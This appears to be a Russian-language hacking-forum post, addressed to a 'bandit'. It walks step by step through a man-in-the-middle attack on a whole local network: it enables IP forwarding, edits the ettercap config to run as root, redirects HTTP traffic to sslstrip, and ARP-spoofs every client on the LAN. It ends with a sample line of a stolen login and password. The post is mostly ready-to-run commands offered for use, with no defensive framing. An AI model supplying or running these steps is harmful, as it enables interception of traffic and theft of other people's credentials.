Дороу бандит, для таких делишек желательно уже установить на флешку OC Kali-Linux, в биосе через no-cd запускаешь, находишь терминал(консоль) думаю проблем не составит.
Открываем консоль и пишем:
Код
echo '1' > /proc/sys/net/ipv4/ip_forward
2) Открываем консоль опять же:
Пишем:
Код
leafpad /etc/etter.conf
Если открывается пустое окно, то пишем это:
Код
leafpad /etc/ettercap/etter.conf
В поле [privs] находим строчки:
Код
ec_uid = %тут какое-то значение% # nobody is the default
ec_gid = %тут какое-то значение% # nobody is the default
Изменяем %тут какое-то значение% на 0.
В итоге будет так:
Код
ec_uid = 0 # nobody is the default
ec_gid = 0 # nobody is the default
Далее жмем ctrl+f и вводим туда iptables
Нас кидает на следующие строчки:
Код
# if you use iptables:
#redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
#redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
Раскомментируем redir_command_on и redir_command_off
В итоге будет так:
Код
# if you use iptables:
redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
3) Теперь нам нужно настроить iptables:
Вводим команду:
Код
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
Теперь весь трафик с 80 порта у нас будет переадресовываться на 8080, на котором мы потом запустим sslstrip
4) Активируем sslstip:
Код
sslstrip -l 8080 -a
-l - порт на котором слушаем
-a - снифать все
5) Запуск атаки
Код
ettercap -T -q -P autoadd -i wlan0 -M arp:remote // //
-T - указываем, что в текстовом режиме
-q - не показываем содержимое пакетов, только пароли
-P autoadd - подключаем плагин autoadd, чтобы у нас все будущие клиенты сети тоже были атакованы
-i wlan0 - указываем, что наш интерфейс это wlan0
-M arp:remote - указываем, что нам нужен именно ARP Spoofing
// // - атакуем всю LAN сеть
Итак, атака запущена.
Чтобы ее отменить нужно нажать q на англ раскладки ( Не CTRL+C! А именно q, чтобы восстановить arp таблицу! )
6) Теперь ждем
7) Как только кто-то залогинится куда либо, то у нас в терминале с ettercap будет строка вида:
Код
HTTP : 217.69.139.60:80 -> USER: offsec PASS: password123 INFO:
Где после USER идет логин, после PASS идет пароль, после INFO будет ссылка
Мы вновь вернули telegram чат форуму, вступайте, общайтесь, задавайте любые вопросы как администрации, так и пользователям!